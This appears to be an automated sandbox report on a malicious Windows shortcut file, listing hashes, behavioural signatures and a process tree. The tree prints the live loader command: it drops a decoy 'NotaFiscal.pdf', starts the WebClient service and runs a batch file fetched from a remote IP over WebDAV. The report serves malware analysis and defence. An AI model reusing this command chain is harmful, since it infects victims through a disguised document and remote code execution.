Analysis
max time kernel: 120s
max time network: 125s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240508-en locale:en-us os:windows10-2004-x64 system
submitted: 09/05/2024, 08:32
Static task: static1
Behavioral task: behavioral1
  Sample: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
  Resource: win10v2004-20240508-en
General
Target: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Size: 2KB
MD5: 7b5db2de0a2d91a0e6f83080e8dd0d6e
SHA1: 5a370fa094efe972929d1e6dc604162821da698b
SHA256: f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747
SHA512: 2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c
Malware Config
Signatures
Checks computer location settings  2 TTPs  2 IoCs
Looks up country code configured in the registry, likely geofence.
  description         ioc                                                                                                   Process
  Key value queried   \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation   cmd.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation   cmd.exe

Launches sc.exe  1 IoCs
Sc.exe is a Windows utility to control services on the system.
  pid    Process
  4788   sc.exe

Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry  2 TTPs  2 IoCs
Processor information is often read in order to detect sandboxing environments.
  description         ioc                                                                    Process
  Key opened          \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0         AcroRd32.exe
  Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz    AcroRd32.exe

Modifies Internet Explorer settings
  description   ioc                                                                                                                                            Process
  Key created   \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION   AcroRd32.exe

Modifies registry class  1 IoCs
  description   ioc                                                                                Process
  Key created   \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings   cmd.exe

Runs ping.exe  1 TTPs  1 IoCs
  pid    Process
  1520   PING.EXE

Suspicious use of SetWindowsHookEx  4 IoCs
  pid   Process
  576   AcroRd32.exe
  576   AcroRd32.exe
  576   AcroRd32.exe
  576   AcroRd32.exe

Suspicious use of WriteProcessMemory  64 IoCs
(identical entries are grouped; the last column gives how many times each entry appears in the 64 listed)
  description                          pid    Process        procid_target   times listed
  PID 4628 wrote to memory of 4136     4628   cmd.exe        84              2
  PID 4136 wrote to memory of 576      4136   cmd.exe        85              3
  PID 4136 wrote to memory of 4788     4136   cmd.exe        87              2
  PID 4136 wrote to memory of 1520     4136   cmd.exe        88              2
  PID 576 wrote to memory of 3228      576    AcroRd32.exe   91              3
  PID 3228 wrote to memory of 3888     3228   RdrCEF.exe     92              41
  PID 3228 wrote to memory of 856      3228   RdrCEF.exe     93              11
Processes
(process tree; indentation shows parent/child relationship, image path on the first line of each entry, command line on the second)

C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4628

    C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"
        - Checks computer location settings
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
        PID:4136

        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
            - Checks processor information in registry
            - Modifies Internet Explorer settings
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
            PID:576

            C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                - Suspicious use of WriteProcessMemory
                PID:3228

                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6BA68E202FED590F4D0ADAD4B998D831 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    PID:3888

                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=960C94DA004A486474BC592E2E122CF0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=960C94DA004A486474BC592E2E122CF0 --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
                    PID:856

                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1ED06CB5CD063518D0580C70C6F87E90 --mojo-platform-channel-handle=2292 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    PID:536

                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BDCF55CB60C80E7169F5DEBF87724C7 --mojo-platform-channel-handle=1788 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    PID:4388

                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D28DE57619EE3673C642454ACFBEE476 --mojo-platform-channel-handle=2376 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    PID:4908

        C:\Windows\system32\sc.exe
            sc start webclient
            - Launches sc.exe
            PID:4788

        C:\Windows\system32\PING.EXE
            ping localhost -n 7
            - Runs ping.exe
            PID:1520

        C:\Windows\system32\cmd.exe
            cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat
            PID:1668

C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID:4396
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 64KB
MD5: 682c99f22249cf9012dda1ea443a4d46
SHA1: f60629143f3e423d3c29bafb2b8d0d82ab946cef
SHA256: 15c3ae29dc7da732d3a1c27b1c62b721825cd1271a8f080f5e1a36936e4fb700
SHA512: 744132df4e4984d606560d0d48097dc4804013cd54c390fa06d0d18125686144dd7b9bab36d1089038b08363174589bed94418354059540bd7e631a59ff36d7e

Filesize: 64KB
MD5: a11c01620326c7d5b7f69d619bed1e93
SHA1: 37febab24fb31c2ac316d2727ddf0128fd39cc2b
SHA256: 02134136b79171c0a67664acd59afbc038903045297abae07fb16e6d41443b33
SHA512: 1846121e3a227908d0b86226ace08d54674840d70f9596dfd394725db9626b3a62a7c52e5e37fa4b3fa019ecca7c23a2439cdc751564968f366fc7b29acd796b

Filesize: 29B
MD5: 823a9caa296579d6a40cd5195d969727
SHA1: 5592813787ecff9133229439498d624339c07ece
SHA256: 60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
SHA512: 77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc